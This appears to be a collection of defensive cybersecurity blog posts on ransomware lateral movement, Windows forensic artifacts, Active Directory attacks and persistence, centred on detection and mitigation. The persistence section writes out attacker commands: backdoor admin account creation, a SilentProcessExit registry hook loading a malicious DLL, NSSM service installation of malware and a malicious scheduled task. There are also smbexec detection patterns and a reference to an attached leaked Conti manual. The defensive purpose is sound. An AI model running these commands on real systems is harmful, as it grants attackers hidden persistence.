    Lateral movement refers to how attackers move through a network after gaining initial access. This allows them to explore the environment, escalate privileges, and reach their final target, often sensitive data or critical systems. Lateral movement is hard to track due to the variety of methods used. Common Lateral Movement Protocols Server Message Block (SMB) : Used for file sharing over the network. TCP ports 137, 138, 139, and 445 are utilized. Tools: PsExec  (SysInternals), smbexec  (Impacket). Event IDs to monitor: 5140 : A network share object was accessed. 4688/4689 : Process creation (Sysmon Event IDs 1 / 5). 7045/7036 : Service creation and status changes. Remote Desktop Protocol (RDP) : Enables remote access to systems. Attackers often add themselves to the “Remote Desktop Users” group. Monitor for Event ID 4728 : "A member was added to a security-enabled global group". RDP Cached Bitmaps: RDP clients store 64x64-pixel bitmap tiles, which are cached by default. These cached images can be obtained and parsed for forensic analysis. I have created an complete blog to analyze RDP Cached Bitmaps (Do check it out to learn more Link below) https://www.cyberengage.org/post/analyzing-and-extracting-bitmap-cache-files-from-rdp-sessions Windows Remote Management (WinRM) : Microsoft’s implementation of the WS-Man protocol. WinRS (Remote Shell) is commonly used in ransomware campaigns. Monitoring: Check for command lines such as winrs.exe -r:target /username:admin /password:pass. Tools like SharpSphere can compromise vSphere infrastructure through WinRM . Windows Management Instrumentation (WMI) : Allows for administrative tasks on remote systems. Often abused by ransomware operators to execute commands or transfer files. Background Intelligent Transfer Service (BITS) : Used for downloading files in the background. Attackers utilize BITS for stealthy data transfers and task execution. Tools Commonly Used for Lateral Movement Ransomware operators and threat actors use a variety of scanners to identify targets for lateral movement: Advanced IP Scanner Advanced Port Scanner Angry IP Scanner Cobalt Strike (built-in scanning capabilities) KPort Scanner nmap Qfinder Pro SoftPerfect Network Scanner Detailed Protocol Insights Server Message Block (SMB) SMB is a primary target for lateral movement. PsExec, for instance, is a popular tool for running processes remotely: PsExec Process : Opens an SMB session to the target. Uploads PSEXESVC.exe  to the ADMIN$ share. Creates a named pipe( Example:- \\client\pipe\svcctl) to talk to the Service Control Manager (SCM). Calls CreateService using the newly uploaded PSEXESVC.exe as ImageFile. Calls StartService to run the service. Detection: File Creations : Monitor for the creation of PSEXESVC.exe. Registry Key : The EULA acceptance is stored in the registry at HK_USERS\[SID]\Software\Sysinternals\PsExec\EulaAccepted. Additional reading on PsExec and SMBexec: Windows Lateral Movement with smb, psexec and alternatives. https://nv2lt.github.io/windows/smb-psexec-smbexec-winexe-how-to/ Remote Desktop Protocol (RDP) For RDP-based lateral movement: Group Membership : Check Event ID 4728 when users are added to the “Remote Desktop Users” group. Bitmap Cache : RDP client stores bitmaps locally, which can be parsed using tools like RdpCacheStitcher, EnCase, and BMC Tools. These tools can help reconstruct images that were viewed during the session, potentially revealing sensitive information. Detecting and Hunting Lateral Movement Detecting PsExec Activity : Process Creation Events : Event IDs 4688/4689   (or S ysmon Event IDs 1/5) . Service Creation : Event IDs 7045/7036  for PSEXESVC, File creations (Sysmon Event ID 11) Registry Monitoring : Look for EULA acceptance in the registry. File Creations : Track the creation of PSEXESVC.exe. Detecting smbexec Activity : Lucene-based queries can help identify smbexec usage. For example: • CommandLine:"powershell.exe -NoP -NoL -sta -NonI -W Hidden -Exec Bypass" • CommandLine:("\\127.0.0.1\C$\__output" OR "127.0.0.1 AND __output") • CommandLine:"%COMSPEC% AND /Q AND /c" • CommandLine:"%COMSPEC%" • FileName:("execute.bat OR __output") • EventID:7045 AND ServiceName:"BTOBTO" To learn more about hunting for Impacket/smbexec, see Riccardo Ancarani’s “Hunting for Impacket” article here: https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/ Ransomware Evolution: Expanding Beyond Windows Ransomware groups are increasingly targeting non-Windows platforms, including Linux, macOS, and virtualization platforms like VMware's vCenter, vSphere, and ESXi. Attacks on vSphere Infrastructure : Tools like SharpSphere  allow attackers to gain control over vSphere infrastructure. Attackers can list VMs, dump memory, or execute code on virtual machines. Targeting ESXi Servers : Attackers exploit vulnerabilities in ESXi servers to encrypt multiple VMs simultaneously. Examples include using custom Python scripts to target ESXi servers. Ransomware-as-a-Service (RaaS) and ESXi Payloads : RaaS platforms like LockBit 3.0 and BlackBasta are generating native ESXi ransomware payloads, making it easier for attackers to target virtualized environments. Incident Response and Forensics on Non-Windows Platforms Manual Artifact Collection: Before mid-2022, collecting forensic artifacts from ESXi and other Unix-like systems was mostly manual, making it a time-consuming process during incident response. Unix-like Artifacts Collector (UAC): Developed by Thiago Canozzo Lahr, this tool automates the collection of system artifacts from various Unix-like operating systems, including ESXi, Linux, macOS, and others. This automation improves the speed and efficiency of incident response efforts. Learning Resources: Leonard Savina's presentation attaching below Thiago Canozzo Lahr's presentation attaching below  Conclusion: By covering all key protocols, tools, detection techniques, and the latest ransomware trends, this blog provides a comprehensive understanding of lateral movement and how to defend against it. Stay vigilant, and make sure to incorporate the detection strategies discussed to protect your network from lateral movement attacks. Akash Patel I have created an blog and a pdf file which will help you investigate artifact in source system and destination system. The pdf contain detection or analysis based on Event IDs as well as based on File system artifact link below: https://www.cyberengage.org/post/understanding-lateral-movement-in-cyber-attacks

  • Overview of the differences between various forensic artifacts:

    LNK (Shortcut) Files: LNK files are Windows shortcut files that contain metadata about the file or program they link to. They can reveal information such as the target file's path, icon location, creation time, and last accessed time. Useful for understanding user behavior, application us age patterns, and potentially identifying executed files. Prefetch Files: Prefetch files are used by Windows to optimize the loading time of frequently accessed programs. They contain metadata about the execution of programs, including the program's name, path, last run time, and frequency of use. Valuable for identifying frequently executed programs and estab lishing user activity patterns. AMCACHE (AMCache.hve): AMCACHE is a Windows registry hive that stores information about program executions and installations. It contains details such as program names, paths, execution counts, first and last execution times, and digital signatures. Provides insights into program execution history, in cluding newly installed software and potentially malicious activities. Shimcache: The Shimcache, found in the Windows registry , maintains a record of executed programs, even if they have been deleted or moved. It includes information such as program paths, last modified timestamps, and execution counts. Useful for identifying executed programs, even if th ey were attempted to be concealed or removed. Note for Shimcache : - Shimcache tracks files that were executed as well as executables that were browsed via File Explorer . Shimcache is located within memory and is written to the registry upon shutdown. This is important to note when collecting a triage image from an online system. If the machine has been running without any reboot/restart/logoff, this artifact will not be available. Shimcache order of execution: Shimcache stores the most recently executed or interacted with files at the top of the registry key. By sorting on the Line column, we're able to view the executables in chronological order, regardless of the file modification timestamp. Jump Lists: Jump Lists are a feature of the Windows taskbar and Start menu that provide quick access to recently or frequently used files and programs. They store information about accessed files, including file names, paths, timestamps, and usage frequency. Helpful for reconstructing user activities , identifying accessed files, and understanding user preferences and behavior. Shell Bags: These structures store information about which folders were most recently browsed by the user , including details such as folder view settings and the last time a folder was visited or updated.

  • Strengthening Defense: Securing Privileged Accounts Against Advanced Attack Tactics

    In the realm of cybersecurity, one of the most targeted areas by adversaries is privileged accounts. These accounts hold elevated permissions, making them high-value targets for threat actors, especially in the context of ransomware operations. Privilege escalation and credential access are two key tactics used by adversaries to gain control over systems. 1. Understanding Privilege Escalation and Credential Access Privilege Escalation (TA0004) Privilege escalation involves an adversary attempting to gain elevated permissions on a system. These elevated privileges enable them to execute commands, install malware, and move laterally across the network. Credential Access (TA0006) Credential access refers to the methods adversaries use to obtain account credentials. These credentials can grant them unauthorized access to systems and data. The most valuable targets are accounts with administrative privileges, such as Domain Admin (DA), Enterprise Admin (EA), and Schema Admin (SA) . Attackers focus on stealing these credentials to gain control over the Active Directory (AD) environment. 2. Best Practices for Securing Privileged Accounts Securing privileged accounts is crucial for minimizing the impact of privilege escalation and credential access attacks. Here are actionable steps to protect these high-privilege accounts: Use Non-Privileged Accounts for Everyday Use Administrators should always use their personal, non-privileged accounts for routine tasks. Elevated accounts, like DA and EA, should only be activated when absolutely necessary and promptly disabled afterward. Enable Windows Defender Credential Guard Credential Guard is a critical feature that helps protect credentials stored in memory from being stolen. While it’s recommended to enable it across all servers, at the very least, it should be activated on critical systems like Domain Controllers (DCs). Learn more about setting up Credential Guar. https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/configure?tabs=intune Utilize the Protected Users Group Place all service accounts, admin accounts, and high-privilege accounts (DA/EA/SA) into the Protected Users group in AD . This limits their exposure to attacks. Learn more about the Protected Users group. https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group Service Account Privileges Service accounts should only have the minimum privilege s required for their function. Be wary of vendor recommendations suggesting excessive privileges for their service accounts. Challenge them and ensure security is prioritized. Avoid Over-Privileged Service Accounts Do not allow vendors to dictate security within your organization by granting over-privileged access to their service accounts. Many ransomware incidents stem from the abuse of such accounts. 3. Local Administrator Password Solution (LAPS) Microsoft offers a free solution known as Local Administrator Password Solution (LAPS) , which is vital for managing local administrator accounts securely. By deploying LAPS, you can significantly reduce the risk of ransomware and other types of attacks that target local admin accounts. Learn more about LAPS. https://www.microsoft.com/en-us/download/details.aspx?id=46899 4. Mitigating Attacks on LSASS and NTDS.dit LSASS (Local Security Authority Server Service) LSASS is responsible for handling authentication requests i n Windows environments, and it stores credentials in memory. Threat actors often try to dump the LSASS process to extract these credentials. Here are some common methods used: Task Manager Dump : A straightforward method where attackers use Task Manager to create a dump file of the LSASS process. SysInternals Process Explorer : This tool provides more sophisticated methods for LSASS dumping. PowerSploit’s Out-MiniDump Cmdlet : A PowerShell command that facilitates LSASS dumping. you can create an alerting for lsass.dmp NTDS.dit The NTDS.dit file is the Active Directory database file. Attackers frequently attempt to steal this file from Domain Controllers. Monitoring file creation events (e.g., Sysmon Event ID 11) and analyzing MFT/UsnJrnl data can help detect unauthorized NTDS.dit access. Focus on hunting for instances where this file exists outside its proper location, such as C:\Windows\NTDS\NTDS.dit. 5. Addressing UAC Bypass Techniques User Account Control (UAC) is designed to prevent unauthorized changes by prompting users for consent. However, malware families like Emotet have built-in UAC bypass capabilities. Other tools may require attackers to manually bypass UAC. While UAC is a valuable layer of security, it is not foolproof, and organizations should implement additional controls to mitigate the risks of privilege escalation. Example of UAC: If a user is an administrator on a host, they will receive a UAC-driven prompt that reads, “Do you want to allow this app to make changes to your device?” You are most likely familiar with this dialog box and its associated Yes/No buttons. 6. Final Thoughts: Leveraging Tools to Secure Your Environment To further enhance security, consider adopting Privileged Access Management (PAM) solutions such as BeyondTrust. Additionally, tools like Microsoft LAPS, Credential Guard, and SysInternals can be valuable assets in defending against privilege escalation and credential access attacks. By implementing these best practices, you can reduce the likelihood of ransomware infections and protect your organization from being compromised by advanced attack tactics. Akash Patel

  • Analyzing and Extracting Bitmap Cache Files from RDP Sessions

    When dealing with Remote Desktop Protocol (RDP) sessions on Windows, one of the often overlooked yet valuable artifacts is the RDP bitmap cache. This cache, designed to enhance performance by storing screen sections that don't change often, can be crucial in forensic investigations. Understanding the Purpose of RDP Bitmap Cache Files The primary purpose of the RDP bitmap cache is to improve performance by caching screen sections that change infrequently. Instead of redrawing the same portions of the screen multiple times during a session, the cache allows the system to pull the image from local storage. This leads to a smoother and more efficient user experience, especially in sessions where certain parts of the screen remain static. However, from a forensic perspective, these cached files can be a goldmine of information. By extracting and analyzing the bitmap cache, forensic analysts can potentially uncover information such as file names, icons, and partial screen contents from an RDP session. Location of Cache Files The cache files are stored in the user profile directory, and their location varies depending on the version of Windows: Windows 7 and later : C:\Users\[user]\AppData\Local\Microsoft\Terminal Server Client\Cache\* Pre-Windows 7 : C:\Documents and Settings\[user]\Local Settings\Application Data\Microsoft\Terminal Server Client\Cache\* Each user profile on a Windows machine will have its own cache files stored in the respective directory. These files contain the cached bitmap data from RDP sessions, making them valuable for forensic analysis. Extracting and Analyzing Bitmap Cache Files Several tools are available for extracting and analyzing these bitmap cache files. BMC Tools Description : BMC Tools is a free and open-source Python script that extracts and analyzes cached bitmap files. It's a powerful tool for forensic investigations, allowing analysts to reconstruct parts of the screen from an RDP session. However, it's worth noting that BMC Tools doesn't automatically reassemble the complete screen. Output will look like below after running above tool Usage : After extracting the cache files using BMC Tools, forensic analysts can manually analyze and piece together the images. The tool's output can help uncover significant details, but it requires careful examination to reconstruct meaningful visuals. GitHub Repository : https://github.com/ANSSI-FR/bmc-tools EnCase Script - "RDP Cached Bitmap Extractor" Description : This script, compatible with the commercial EnCase forensic software, allows for the extraction of cached bitmap images. EnCase is a widely used tool in forensic investigations, and this script integrates seamlessly with its ecosystem. Usage : Using this script within EnCase, analysts can extract and analyze bitmap cache files. However, it requires a licensed copy of EnCase, which may be a limitation for some forensic teams. Limitation : EnCase's script also doesn't reassemble the full screen, but it provides a robust framework for extracting and working with cached data. RdpCacheStitcher Description : This tool, developed by the Bundesamt für Sicherheit in der Informationstechnik (BSI), provides a user interface for creating collages manually from the output of tools like BMC Tools. It's a useful tool for visualizing and manually piecing together cached bitmap files. Usage : After extracting images with tools like BMC, RdpCacheStitcher allows analysts to arrange and stitch together these images into a coherent collage. The interface simplifies the manual reconstruction process. GitHub Repository https://github.com/BSI-Bund/RdpCacheStitcher BriMor Lab’s “rdpieces” Description : rdpieces is a Perl script designed to automatically rebuild screenshots from cached bitmap files. It attempts to automate the tedious process of piecing together bitmap fragments, potentially saving time for forensic analysts. Usage : While not perfect, rdpieces offers a more automated approach to reconstructing screens from cached data. However, the accuracy of the reconstruction may vary depending on the complexity of the cached files. GitHub Repository : https://github.com/brimorlabs/rdpieces?tab=readme-ov-file Output: Challenges in Reassembly One of the significant challenges in working with RDP bitmap cache files is reassembling the images. The cache files aren't written in a linear or predictable order. Various factors, such as mouse movement or screen changes, can affect the order of cached tiles. As a result, reconstructing a complete image from these cached tiles is often compared to solving a jigsaw puzzle. While tools like rdpieces attempt to automate this process, the reconstruction isn't always perfect . Forensic analysts must often rely on manual intervention to piece together significant details such as file names, desktop icons, and portions of the screen background. Conclusion The extraction and analysis of bitmap cache files from RDP sessions offer a unique avenue for forensic investigation. Tools like BMC Tools, RdpCacheStitcher, and rdpieces provide a range of options for working with these cached images, each with its strengths and limitations. While automated reconstruction is challenging, these tools, combined with manual analysis, can help forensic investigators uncover valuable insights from RDP sessions. Akash Patel

  • Active Directory Attacks: A Dive into Ransomware Tactics

    Active Directory (AD) is the backbone of many corporate networks, providing centralized management of users, devices, and permissions. With its central role, AD has become a prime target for ransomware operators and threat actors seeking higher levels of access and persistence within networks. Why Active Directory? Active Directory is critical for managing network resources, authentication, and security policies. Attackers target AD because compromising it can lead to widespread access, allowing them to move laterally, escalate privileges, and gain control over entire environments. Will not go in depth of AD but few info: Microsoft’s Active Directory (AD) provides a centralized database and services that allow users to connect to networking resources Domains use a Domain Name System (DNS) structure to organize namespaces into logical units. For example, a domain of victimnetwork.local might be set up to contain resources specific to a logical grouping of users, computers, and other objects within the AD database. Domain controllers (DCs) are servers that respond to authentication requests and determine if the requesting users should be provided access to the domain. The DCs in an AD environment may also provide services and protocols such as DNS, Dynamic Host Configuration Protocol (DHCP), and other services that facilitate allowing hosts access to the network or resources provided within Authentication within AD is often carried out via the Kerberos authentication protocol. If you are using a Windows computer on a corporate network, you most likely are connected to AD. The overall AD system provides the domain to which you are connected. In order to be connected to said domain, you must authenticate to the domain. You typically carry out these activities by logging in to your machine using the provided username and password for your domain account. Popular Tools Used in Active Directory Attacks Nltest What It Does : A built-in Windows command-line tool, nltest helps attackers pull domain-related information, such as domain lists and trust relationships. Why It’s Used : It provides attackers with a quick and easy way to perform reconnaissance on the AD environment. AdFind What It Does : Originally developed as an LDAP query tool for IT admins, AdFind has been repurposed by attackers to extract data from AD environments. Why It’s Used : It is highly respected among attackers for its ability to pull detailed AD information, including user accounts, group memberships, and more. BloodHound What It Does : BloodHound is a reconnaissance tool that maps relationships between AD objects, helping attackers identify vulnerable attack paths. Why It’s Used : It provides a graphical interface that makes it easier for attackers to understand the AD environment and find weaknesses to exploit. Mimikatz What It Does : A well-known credential harvesting tool , Mimikatz can extract credentials directly from memory, including passwords, hashes, and Kerberos tickets. Why It’s Used : Mimikatz is a go-to tool for attackers looking to escalate privileges and gain deeper access to the network. Rubeus What It Does : Rubeus is a C# tool focused on Kerberos attacks, such as Kerberoasting and AS-REP Roasting. Why It’s Used : It allows attackers to steal encrypted credentials and crack them offline , often leading to compromised accounts. CrackMapExec What It Does : This versatile post-exploitation tool helps attackers assess and exploit security weaknesses in AD environments. Why It’s Used : CrackMapExec is a powerful tool that simplifies the process of exploiting AD vulnerabilities, making it a favorite among threat actors. Common Active Directory Attack Techniques Now, let's delve into some of the most common AD attacks used by ransomware operators and threat actors. 1. BloodHound and AD Reconnaissance BloodHound is often used after initial access to map out the AD environment. Attackers use a collector called SharpHound to gather information on AD objects, such as users, computers, and groups. Once this data is collected, it is passed to BloodHound, which generates a graphical representation of attack paths using the Neo4j graph database. Detection : Monitor for SharpHound (or any renamed executables) being written to disk (System Event ID 11, via EDR, or manual MFT analysis). Pay attention to the file's original name to spot potential renaming attempts. Look for signs of reconnaissance activity, such as unusual LDAP queries. 2. Kerberoasting Kerberoasting targets service accounts within AD that have a Service Principal Name (SPN) assigned. Attackers request a Kerberos ticket for these accounts, which contains an encrypted version of the account's password. Once the ticket is obtained, attackers attempt to crack the password offline. Detection : Enable "Audit Kerberos Service Ticket Operations" in AD. Monitor for Event ID 4769, focusing on Ticket Options (0x40810000) and Ticket Encryption (0x17 for RC4). Alert on .kirbi file creation (Mimikatz saves tickets with a .kirbi extension). Watch for known Kerberoasting tools like Mimikatz and Rubeus in your environment. Mitigation : Remove SPNs from accounts where possible. Use strong, non-crackable passwords for service accounts (long and high-entropy). Consider using Managed Service Accounts (MSAs) to mitigate the risk.] 3. AS-REP Roasting AS-REP Roasting exploits accounts with Kerberos pre-authentication disabled . In a typical Kerberos authentication process, pre-authentication ensures that the user's password is verified by the Key Distribution Center (KDC) before issuing a ticket. However, if pre-authentication is disabled, attackers can request an AS-REP message without needing to supply a valid password. Detection : Monitor for Event ID 4768, focusing on accounts where the Pre-Authentication Type is 0. Investigate why pre-authentication is disabled for any accounts in your environment. Mitigation : Review accounts with pre-authentication disabled and re-enable it where possible. Ensure that accounts with pre-authentication disabled have strong, non-crackable passwords. 4. DCSync Attack DCSync is a powerful attack that allows an attacker to simulate the behavior of a domain controller (DC) and request replication of AD data. By gaining replication permissions, the attacker can pull password hashes for all users in the domain, including highly privileged accounts like Domain Admins. Detection : Monitor for Event ID 4662 , which indicates that an operation was performed on an AD object. Pay attention to properties associated with Control Access, particularly the following: DS-Replication-Get-Changes DS-Replication-Get-Changes-All DS-Replication-Get-Changes-In-Filtered-Set The following values are the Control Access values important to DCSync attacks: • {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} – DS-Replication-Get-Changes • {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} – DS-Replication-Get-Changes-All • {89e95b76-444d-4c62-991a-0facbeda640c} – DS-Replication-Get-Changes Watch for accounts being granted replication permissions, as this is a key indicator of a potential DCSync attack. Mitigation : Lock down replication permissions and ensure that only necessary accounts have this level of access. Use strong, non-crackable passwords for accounts with replication permissions. Regularly audit accounts with high-level privileges, especially those with replication permissions. Conclusion: Protecting Active Directory Active Directory attacks are a significant threat to organizations, particularly when leveraged by ransomware operators. These attacks can provide attackers with deep access to your network and the ability to spread ransomware across the entire environment. For more in-depth details on some of these attacks, check out this insightful post on DCSync attacks by Jaye , which explores AD replication in detail. https://www.cyberengage.org/post/unveiling-threats-exploring-active-directory-replication-from-non-machine-account-mimikatz-dc-syn Akash Patel Bonus: If you know that conti ransomware group had a documentation leak in 2021, the document basically contained training for affiliates how to conduct attacks (manual was named  CobaltStrike MANUALS v2 Active Directory” Attaching it for you:

  • Persistence: The Art of Staying Hidden

    In the world of ransomware, persistence is key. Once attackers gain access to a system, their goal is to maintain that access for as long as possible, often without detection. To achieve this, they use a variety of techniques, ranging from post-exploitation frameworks to seemingly legitimate remote monitoring and management (RMM) tools. Let's dive in. Post-Exploitation Frameworks: The GitHub Goldmine GitHub is a treasure trove for cybercriminals, offering a wide array of post-exploitation frameworks that can be easily pulled and deployed. These frameworks are often designed to help attackers establish persistence on compromised systems. Some of the most notorious examples include: Emotet and TrickBot:  These Malware-as-a-Service (MaaS) families are well-known for their persistence techniques. Web Shells:  Ransomware actors are increasingly leveraging web shells, which are scripts dropped onto a web server. These scripts, whether ASPX for IIS or ASP for Apache or Nginx, allow attackers to connect to the system via HTTP/HTTPS and run commands. This method is particularly stealthy, as it blends in with normal web traffic, making it difficult to detect. Learn More:  For an in-depth look at web shells, at this link . RMM Tools: Hiding in Plain Sight Ransomware affiliates are increasingly using RMM tools to establish persistence. These tools, designed for legitimate remote management of systems, can be a double-edged sword. In the hands of an attacker, they blend seamlessly into the victim’s environment, often going unnoticed by IT and security teams. Why RMM Tools Are Dangerous: Legitimacy:  RMM tools are often mistaken for legitimate software, making it easy for attackers to maintain access without raising red flags. Baseline Monitoring:  If your organization doesn't have an approved list of RMM tools integrated with your software management system, it’s time to create one. Establish a baseline and set up alerts for any RMM tools that don't match it. For example, if ScreenConnect is the only approved RMM tool, any other RMM software should trigger an alert. RMM Tool Analysis: Here’s where you can find logs for some common RMM tools: AnyDesk: %PROGRAMDATA%\AnyDesk\connection_trace.txt %PROGRAMDATA%\AnyDesk\ad_svc.trace %APPDATA%\AnyDesk\ad.trace ConnectWise: %SYSTEMROOT%\temp\screenconnect\[version]\ %PROGRAMDATA%\ScreenConnect Client ([fingerprint])\ %PROGRAMFILES(x86)%\ScreenConnect Client ([fingerprint])\ %USERPROFILE%\Documents\ConnectWiseControl\Files\ %USERPROFILE%\Documents\ConnectWiseControl\captures\ TeamViewer: C:\Program Files\TeamViewer\Connections_incoming.txt C:\Program Files\TeamViewer\TeamViewer15_Logfile.log C:\Program Files\TeamViewer\TVNetwork.log %APPDATA%\TeamViewer\TeamViewer15_Logfile.log %LOCALAPPDATA%\Temp\TeamViewer\TV15Install.log Learn More:  For a deeper dive into RMM tool analysis, check out Théo Letailleur’s article on legitimate RATs for more on TeamViewer, AnyDesk, Atera, and Splashtop at this link . The Rise of Post-Exploitation Frameworks Post-exploitation frameworks, both commercial and open-source (FOSS), are commonly used by ransomware actors to establish persistence. Commercial Tools:  Cobalt Strike and Brute Ratel are two of the most popular commercial tools used in ransomware attacks. FOSS Solutions:  Open-source frameworks like the former PowerShell Empire project are also widely used. Even though the original PowerShell Empire project has been archived, a new project called Empire has picked up where it left off . This new project combines the PowerShell Empire and Python EmPyre projects , and it's frequently leveraged in ransomware campaigns. Learn More:  For more details on Empire, check out the project’s web page at this link . Persistence Techniques: Account Creation Attackers use various methods to create new user accounts and add them to privileged groups. The standard tools they use include Command Prompt and PowerShell. Command Prompt Commands: Attackers can use the net user and net localgroup commands to create new user accounts and elevate them to privileged groups. net user SAMAdmim #sorryNOTsorry# /add net localgroup administrators SAMAdmim /add net localgroup "Remote Desktop Users" SAMAdmim /add PowerShell Commands: PowerShell provides cmdlets to achieve the same result in a more scriptable way New-LocalUser -Name "SAMAdmim" -Password (ConvertTo-SecureString "#sorryNOTsorry#" -AsPlainText -Force) -FullName "SAM Administrator" -Description "Admin user" Add-LocalGroupMember –Groups administrators –Member SAMAdmim Add-LocalGroupMember –Groups "Remote Desktop Users" –Member SAMAdmim Event-Based Detection Event ID 4720:  A user account was created.. Event ID 4728:  A member was added to a security-enabled global group. Artifact-Based Detection In addition to monitoring event logs, examining filesystem artifacts can help identify unauthorized account creation. Creation Timestamps: When a new user account is created, a corresponding directory is created under C:\Users\[User]. Reviewing the creation timestamp of this directory can reveal when the account was created, which can be useful for timeline analysis. NTUSER.DAT Registry Hive: Each user account has an associated NTUSER.DAT registry hive that stores user-specific configuration data. Investigating the creation timestamp and contents of this file can provide further evidence of unauthorized activity. 2. Boot/Logon Autostart The most common persistence methods used by threat actors and malware, focusing on techniques that have been prevalent since the 1990s. Ransomware operators, in particular, frequently employ these methods to maintain control over infected systems. Run Keys (Registry-based Autostart Entries): Run and RunOnce Keys  are frequently used for persistence by malware. These registry keys allow applications to be executed automatically when a user logs in. Example path: HKLM\Software\Microsoft\Windows\CurrentVersion\Run HKCU\Software\Microsoft\Windows\CurrentVersion\Run These keys are some of the oldest and most widely abused mechanisms, and they still remain popular among modern threat actors, including ransomware operators. Startup Folder: Placing shortcuts or scripts in the startup folder ensures that the malware will be executed whenever the user logs into Windows. Example path: C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup Winlogon: The Winlogon process is responsible for handling user logons. By modifying specific registry values, attackers can execute code during the logon process. Two popular values within the Winlogon key are Userinit and Shell. Example path: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon This method is stealthier than Run keys, as it directly ties into the user authentication process. SilentProcessExit: This method leverages a registry key that allows the configuration of an action to be executed when a specific process exits. For example, the following command creates persistence by launching rundll32 to execute a function from a malicious DLL whenever Notepad is closed. reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "c:\windows\system32\cmd.exe rundll32.exe c:\users\public\music\not_a_beacon.dll,Control_runDLL" This method allows malware to stay hidden until a seemingly benign process, like Notepad, exits. MITRE ATT&CK Framework: Autostart Locations The MITRE ATT&CK framework provides a detailed list of common autostart locations, which are frequently abused for persistence. You can find an extensive catalog of these techniques at MITRE ATT&CK - T1547.001 . Some of the most notable locations include: Startup Folder: C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup RunOnceEx Key: HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx Explorer User Shell Folders: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Shell Folders: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders These autostart locations are often the first place incident responders and forensic analysts check when hunting for signs of persistence. 3. Services and Their Role in Ransomware Persistence In most ransomware attacks, the installation of services plays a critical role in ensuring persistence. Services allow ransomware to continue running in the background, often with elevated privileges. How Services Work in Windows A service in Windows is a background process that typically starts when the computer boots and runs without user interaction. These services are managed using commands like sc or net, or via PowerShell cmdlets like Get-Service and Stop-Service. Event IDs to Monitor for Services PE (Portable Executable): This is a file format used by Windows for executables, DLLs, and others. However, not all PE files are capable of running as a service. They need to be specifically designed with the necessary code to interact with the Windows Service Control Manager (SCM) to start, stop, and handle service-related commands. Example: A regular application like notepad.exe is a PE file , but it cannot run as a service because it doesn't have the necessary code to function as a service. Service Handlers and ImagePath ImagePath: When you define a service in the Windows registry, one of the keys associated with the service is the ImagePath. This key points to the executable file on disk that handles the service. Example: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MyService ImagePath = "C:\Program Files\MyService\MyService.exe" NSSM (Non-Sucking Service Manager) The Non-Sucking Service Manager is a tool that allows you to run any executable as a service, even if that executable was not designed to run as one. Why is this important for adversaries? Regular malware executables (PE files) are not designed to run as services . However, using NSSM, attackers can force these malware files to run as a service, allowing the malware to start automatically when the system boots and run in the background without user intervention. Example of NSSM Usage: Let's say an attacker has a malicious executable named malware.exe . Normally, malware.exe is just a regular PE file and cannot run as a service. By using NSSM, the attacker can create a service that uses malware.exe as the service handler: nssm install MyMalwareService "C:\Path\To\malware.exe" This command tells NSSM to install malware.exe as a service named MyMalwareService. Now, every time the system boots, malware.exe will run as a service, making it harder to detect and remove. 4. Scheduled Tasks: In many ransomware attacks, scheduled tasks are commonly employed as a method of persistence. Attackers use tools like schtasks.exe to automate the execution of malicious code at specific intervals or events, ensuring that their malware remains active on the system even after a reboot. Example of a Malicious Scheduled Task Threat actors often use the schtasks.exe command to create malicious tasks. For example, cmd.exe /c schtasks /f /create /ru samadmin /sc ONLOGON /tn "\Microsoft\windows\XBox" /tr "%COMSPEC% /c %APPDATA%\42.exe" This command creates a scheduled task named "samadmin" in the \Microsoft\windows\XBox container. The task is set to trigger upon user logon (/sc ONLOGON) and runs the file located at %APPDATA%\42.exe. Essentially, every time the user logs in, the malicious executable (42.exe) is executed.\ Event-Based Detection: Registry and File System Artifacts Windows stores scheduled task information in various locations within the system. Registry Keys: SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Schedule\TaskCache\Tasks SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Schedule\TaskCache\Tree Task Definitions on Disk: C:\Windows\System32\Tasks\ Each task in Windows is defined by an XML file stored in this directory. These XML files describe the task's behavior, including the program to be executed, the trigger conditions, and the user context under which the task runs. When conducting a forensic investigation, it is crucial to collect all files from this directory, as they provide detailed information about the scheduled tasks on the system 5. WMI Event Subscription: Stealthy Persistence Technique Windows Management Instrumentation (WMI) is a powerful framework used for managing data and devices in a Windows environment. Unfortunately, threat actors have recognized WMI's capabilities and have been leveraging it for stealthy persistence. WMI subscriptions rely on three main components: Filters:  Define the conditions under which the subscription will trigger. Consumers:  Define the action or command to execute when the subscription triggers. Binders:  Link the filter and consumer together, creating a fully functional WMI subscription Example WMI Event Subscription Suppose an attacker wants to execute malicious code whenever the system reaches a certain uptime. The filter defines the condition (system uptime), and the consumer specifies the malicious code to execute: Filter:  Monitors system uptime and triggers when the uptime is between 240 and 325 seconds. Consumer :   Executes LegitUpdater.exe from the C:\Windows\Temp\ directory when the filter condition is met. With this setup, the malicious code is executed in the background whenever the system uptime condition is satisfied, allowing the attacker to maintain persistence without detection. Further Reading on WMI Persistence For a deep dive into WMI's capabilities and persistence techniques, I have created an extensive series of blog posts covering various aspects of WMI: Part 1: WMI – A Deep Dive into its Capabilities and Stealthy Persistence Techniques Part 2: WMI – Detecting and Defending Against WMI-based Attacks Part 3: WMI – Understanding WMI Event Consumers in Cybersecurity Part 4: WMI – The Intricacies of MOF Files: A Gateway for Malicious Infiltration in WMI Part 5: WMI – Unveiling the Persistence of Malicious MOF Files: A Deep Dive into PRAGMA AUTORECOV Part 6: WMI – Hunting Down Malicious WMI Activity For more detailed insights into WMI event consumers, you can also explore Matthew Green’s article, "WMI Event Consumers: What Are You Missing?"  available in the Velociraptor project documentation here . Conclusion Persistence techniques are a cornerstone of many ransomware attacks and other forms of malware, allowing adversaries to maintain their 